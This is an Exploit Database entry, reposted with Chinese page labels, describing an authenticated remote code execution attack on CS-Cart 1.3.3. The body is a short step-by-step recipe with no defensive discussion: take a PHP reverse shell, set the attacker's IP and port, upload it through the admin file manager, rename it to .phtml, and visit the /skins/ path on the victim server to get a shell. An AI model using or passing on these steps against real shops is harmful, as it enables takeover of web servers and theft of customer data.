CS-Cart 1.3.3 – authenticated RCE

• Exploit Database
• 13 阅读

• 作者： 0xmmnbassel
  日期： 2020-10-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48891/

• # Exploit Title: CS-Cart authenticated RCE
  # Date: 2020-09-22
  # Exploit Author:0xmmnbassel
  # Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
  # Tested at: ver. 1.3.3
  # Vulnerability Type: authenticated RCE
  
  
  
  get PHP shells from
  php-reverse-shell
  
  edit IP && PORT
  Upload to file manager
  change the extension from .php to .phtml
  visit http://[victim]/skins/shell.phtml --> Profit. ...!